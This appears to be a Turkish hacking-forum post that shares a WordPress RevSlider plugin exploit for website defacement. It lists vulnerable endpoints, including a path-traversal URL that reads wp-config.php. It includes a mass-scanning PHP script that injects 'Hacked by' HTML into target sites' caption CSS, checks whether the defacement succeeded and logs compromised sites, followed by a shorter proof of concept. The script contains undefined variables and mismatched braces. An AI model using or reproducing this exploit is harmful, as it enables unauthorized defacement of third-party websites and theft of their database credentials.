WordPress RevSlider Get Caption CSS Exploit

1. Yazar => KingSkrupellos - Cyberizm Digital Security Team
2.  
3. Selamün Aleyküm Cyberizm Ailesi. Birkaç günden beri zone-h.org'da Index PHP, YunusIncredibl,Islamic State,Holako,Lunatico gibi hackerların kastığı açığı paylaşıcam. Cyberizm için elinizden geleni arkanıza koymayın.
4.  
5. Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html
6.  
7. Açığın Kaynaklandığı Yerler =>
8.  
9. [code]/wp-content/plugins/revslider/revslider_admin.php[/code]
10.  
11. [code]/revslider_admin.php[/code]
12.  
13. [code]HEDEFSITE/wp-admin/admin-ajax.php[/code]
14.  
15. [code]HEDEFSITE/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[/code]
16.  
17. Açık direk şu kodlardan oluşuyor.
18.  
19. [code]232. $action = self::getPostGetVar("client_action");
20. 233. $data = self::getPostGetVar("data");
21. ...
22. 301. case "get_captions_css":
23. 302. $contentCSS = $operations->getCaptionsContent();
24. 303. self::ajaxResponseData($contentCSS);
25. ...
26. 305. case "update_captions_css":
27. 306. $arrCaptions = $operations->updateCaptionsContentData($data);
28. 307. self::ajaxResponseSuccess("CSS file saved
29. succesfully!",array("arrCaptions"=>$arrCaptions))[/code]
30.  
31. Hacklediğiniz Yeri Görmek için =>
32. [code]/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css[/code]
33.  
34. Eğer Exploiti Doğru yaptıysanız yukarıdaki linkten ctrl + a'ya bastığınız zaman
35.  
36. [code]{"success":true,"message":"","data":"[/code]
37.  
38. böyle yazıyorsa exploit çalışmış demektir ve yazınız ekranda gözükecektir.
39. İşte O Exploit =>
40.  
41. [hide][code]<?php
42. echo "\n+-------------------------------------------+\n";
43. echo "| Cyberizm Digital Security Army |\n";
44. echo "| http://www.cyberizm.org/ |\n";
45. echo "+-------------------------------------------+\n";
46.  
47. $gv=@file_get_contents($argv[1]);
48. $exv=explode("\r\n",$gv);
49. echo "\n\t Total site loaded : ".count($exv)."\n\n";
50. foreach($exv as $url){
51. echo "\n[+]Scaning : $url \n";
52. dr($url);
53. }
54. function dr($site){
55. $ch = curl_init();
56. curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
57. curl_setopt($ch, CURLOPT_USERAGENT, $agent);
58. curl_setopt($ch, CURLOPT_POST, 1);
59. curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
60. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
61. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
62. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
63. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
64. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
65. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
66. $result = curl_exec($ch);
67. if (eregi('true', $result))
68.  
69. $path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
70. $gett=@file_get_contents($path);
71. if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
72. echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
73. $fo = fopen("finish.txt","a+");
74. $r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
75. fclose($fo);
76. } else {
77. echo "| ".$site . " : Not Revslider \n\n";
78. }
79. curl_close($ch);
80.  
81. }
82.  
83. echo "\n[-]Exploit Fail \n\n";
84. }
85.  
86.  
87.  
88. }
89. ?>[/code][/hide]
90.  
91.  
92. Exploitin Daha Kısa Şekli
93. [hide][code]<?php
94.  
95. $post = array
96. (
97. "action" => "revslider_ajax_action",
98. "client_action" => "update_captions_css",
99. "data" => "<marquee>Malicious Code Here</marquee>"
100. );
101.  
102. $ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
103. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
104. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
105. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
106. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
107. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
108. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
109. curl_setopt ($ch, CURLOPT_POST, 1);
110. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
111. $data = curl_exec ($ch);
112. curl_close ($ch);
113.  
114. ?>[/code][/hide]